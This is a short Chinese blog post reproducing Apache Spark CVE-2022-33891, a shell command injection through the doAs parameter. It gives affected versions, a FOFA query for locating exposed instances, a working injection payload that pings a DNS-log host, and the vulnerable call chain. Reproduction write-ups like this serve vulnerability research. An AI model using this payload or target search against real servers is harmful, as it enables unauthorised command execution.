Apache Spark(CVE-2022-33891)复现

admin 2022年7月21日16:38:10评论244 views字数 679阅读2分15秒阅读模式


Apache Spark(CVE-2022-33891)复现

---------------------


Apache Spark(CVE-2022-33891)复现欢迎关注公众号:虚拟尽头


几天前看到360漏洞云发了个Spark的通告,当时想着没见过apache的这种系统,就想着复现一下,然后过了两天看到且听安全发了漏洞的详情分析

CVE-2022-33891 Apache Spark shell 命令注入漏洞

于是就想着来复现一下这个漏洞

Apache Spark(CVE-2022-33891)复现

01

影响版本以及FOFA语句

3.0.33.1.1 to 3.1.23.2.0 to 3.2.1app="APACHE-Spark" && body="3.0.3"

影响的版本范围并不多。

02

复现

payload:/jobs/?doAs=`ping dnslog.com`

Apache Spark(CVE-2022-33891)复现

03

调用流程

hrep.getParameter("doAs")checkUIViewPermissionsisUserInACLgetCurrentUserGroupsgroupMappingServiceProvider.getGroupsgetUnixGroupsexecuteAndGetOutputexecuteCommand

由于传播、利用此文档提供的信息而造成任何直接或间接的后果及损害,均由使用本人负责,文章作者不为此承担任何责任。



往期文章

一次src挖洞经历(不是一个)

SRC 挖洞tips

如何做到更加细致的信息搜集(上)

如何做到更加细致的信息搜集(下)

使用Yakit快速刷取cnvd

面试经历 - 某数字厂- 安服实习生

Apache Spark(CVE-2022-33891)复现Apache Spark(CVE-2022-33891)复现Apache Spark(CVE-2022-33891)复现师傅们,聊天框发送"二维码",加我好友一起交流呀(加的时候请备注来自公众号)。

原文始发于微信公众号(虚拟尽头):Apache Spark(CVE-2022-33891)复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月21日16:38:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apache Spark(CVE-2022-33891)复现https://cn-sec.com/archives/1190965.html

发表评论

匿名网友 填写信息